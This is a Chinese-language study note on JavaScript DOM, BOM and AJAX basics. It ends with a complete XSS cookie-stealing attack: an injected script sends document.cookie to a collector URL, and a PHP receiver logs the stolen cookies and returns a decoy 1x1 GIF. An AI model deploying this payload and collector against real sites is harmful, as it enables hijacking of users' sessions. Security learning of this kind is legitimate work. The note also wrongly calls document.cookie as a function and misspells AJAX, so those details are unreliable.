HTML DOM(文档对象模型)
当网页被加载时,浏览器会创建页面的文档对象模型,
document.getElementById('demo').innerHTML
通过Id来查询元素内容
document.getElementsByClassName('dome1')[0].innerHTML
通过ClassName来查询网页中第一个classname为dome1的元素内容,因为同一个页面中同一个ClassName可能有很多标签。
document.getElementsByTagName('h1')[4].innerHTML
通过标签名来查询第5个标签为
元素内容,因为同一个页面中同一个标签名可能有很多个。
document.cookie()
获取当前页面的cookie
BOM(Browser Object Model)-浏览器对象模型,它使JavaScript有能力与浏览器“对话”
window.open()--打开新窗口
window.close()--关闭当前窗口
window.location.href--页面跳转
其实alert()
,就是js的BOM.
能弹窗的除了alert()
,还有confirm()
和prompt()
js的AJAX:异步的JavaScript和XML
JAX技术通过在后台与服务器进行少量数据交换,AJAX可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。
配合xss可以进行窃取cookie:
xss处插入:
<script>
var userCookie = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1/1.php", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("cookie=" + encodeURIComponent(userCookie));
</script>
我们自己服务器上的接受php:
if(isset($_POST['cookie'])) {
// 接收到了用户的cookie信息
$cookie = $_POST['cookie'];
// 将cookie信息写入日志文件
$logfile = fopen("cookie.log", "a");
fwrite($logfile, $cookie."\n");
fclose($logfile);
// 返回一个1x1像素的gif图片,用于避免浏览器的报错
header('Content-Type: image/gif');
header('Content-Length: 43');
die(base64_decode('R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs='));
} else {
// 没有接收到cookie信息
header('HTTP/1.1 400 Bad Request');
die();
}
?>